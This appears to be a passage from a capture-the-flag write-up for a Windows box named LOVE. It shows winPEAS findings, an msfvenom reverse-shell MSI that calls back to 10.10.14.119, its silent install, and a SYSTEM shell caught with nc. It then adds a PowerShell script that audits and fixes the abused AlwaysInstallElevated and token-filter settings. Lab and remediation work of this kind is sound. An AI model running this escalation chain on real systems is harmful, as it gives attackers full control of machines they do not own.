3 privesc
systeminfo
Host Name: LOVE
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
System Type: x64-based PC
PEAS
copy \\10.10.14.119\drive\win.exe
1 file(s) copied.
[+] Cached Creds
[?] If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.xyz/windows/stealing-credentials/credentials-protections#cached-credentials
cachedlogonscount is 10
[+] UAC Status
[?] If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#basic-uac-bypass-full-file-system-access
ConsentPromptBehaviorAdmin: 0 - No prompting
EnableLUA: 1
LocalAccountTokenFilterPolicy: 1
FilterAdministratorToken: 0
[*] LocalAccountTokenFilterPolicy set to 1.
[+] Any local account can be used for lateral movement.
[+] PowerShell Settings
PowerShell v2 Version: 2.0
PowerShell v5 Version: 5.1.19041.1
PowerShell Core Version:
Transcription Settings:
Module Logging Settings:
Scriptblock Logging Settings:
PS history file: C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
PS history size: 51B
[+] Checking AlwaysInstallElevated
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
AlwaysInstallElevated set to 1 in HKLM!
AlwaysInstallElevated set to 1 in HKCU!
[+] Enumerating NTLM Settings
LanmanCompatibilityLevel : (Send NTLMv2 response only - Win7+ default)
Using https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.119 LPORT=7070 -f msi -o reverse.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: reverse.msi
copy \\10.10.14.119\drive\reverse.msi
1 file(s) copied.
msiexec /quiet /i reverse.msi
$ rlwrap nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.14.119] from (UNKNOWN) [10.129.105.29] 52606
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
whoami
nt authority\system
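The SYSTEM shell above comes from the two findings winPEAS flagged: AlwaysInstallElevated set to 1 in both HKLM and HKCU (so msiexec installs any package as SYSTEM), and LocalAccountTokenFilterPolicy set to 1. The following audit script is an added example, not part of the writeup or of winPEAS; it reads the same registry values on a local host, reports which ones are in the risky state, and with -Fix writes the hardened value. It assumes an elevated PowerShell session and uses the standard Windows Installer and UAC policy key paths.

```powershell
# Added example (not from the original writeup): audit the AlwaysInstallElevated
# and LocalAccountTokenFilterPolicy settings that winPEAS reported, and
# optionally remediate them. Assumes an elevated PowerShell session.
[CmdletBinding()]
param(
    [switch]$Fix   # when set, write the hardened value instead of only reporting
)

function Get-RegDword {
    param([string]$Path, [string]$Name)
    try {
        return (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name
    } catch {
        return $null   # key or value absent: Windows treats this as "not enabled"
    }
}

# Each entry: where the value lives, what the risky value is, what to set instead.
$checks = @(
    @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
       Name = 'AlwaysInstallElevated'; Bad = 1; Good = 0
       Why  = 'machine half: with HKCU also 1, any MSI run by a standard user installs as SYSTEM' },
    @{ Path = 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
       Name = 'AlwaysInstallElevated'; Bad = 1; Good = 0
       Why  = 'user half of the same setting; both halves must be 1 for the escalation to work' },
    @{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
       Name = 'LocalAccountTokenFilterPolicy'; Bad = 1; Good = 0
       Why  = 'remote UAC token filtering disabled: local admin accounts get a full token over the network' }
)

$findings = foreach ($c in $checks) {
    $val = Get-RegDword -Path $c.Path -Name $c.Name
    [pscustomobject]@{
        Setting = "$($c.Path)\$($c.Name)"
        Value   = if ($null -eq $val) { '<not set>' } else { $val }
        Risky   = ($val -eq $c.Bad)
        Why     = $c.Why
    }
    if ($Fix -and $val -eq $c.Bad) {
        if (-not (Test-Path $c.Path)) { New-Item -Path $c.Path -Force | Out-Null }
        Set-ItemProperty -Path $c.Path -Name $c.Name -Value $c.Good -Type DWord
        Write-Host "Remediated $($c.Path)\$($c.Name) -> $($c.Good)"
    }
}

$findings | Format-Table -AutoSize -Wrap

# Non-zero exit code so the script can be used from a scheduled compliance check.
if (-not $Fix -and ($findings.Risky -contains $true)) {
    Write-Warning 'One or more settings are in the state winPEAS flags as exploitable.'
    exit 1
}
exit 0
```

Run it as `.\Audit-InstallerPolicy.ps1` to report, or `.\Audit-InstallerPolicy.ps1 -Fix` to set the values to 0. Because the escalation needs both AlwaysInstallElevated halves to be 1, clearing the HKLM value (which Group Policy controls) is enough to close it domain-wide; the HKCU value only matters for the profile it lives in. The MSI packages Windows Installer runs are also logged under the MsiInstaller source in the Application event log, which is the place to look for unexpected installs that ran as SYSTEM.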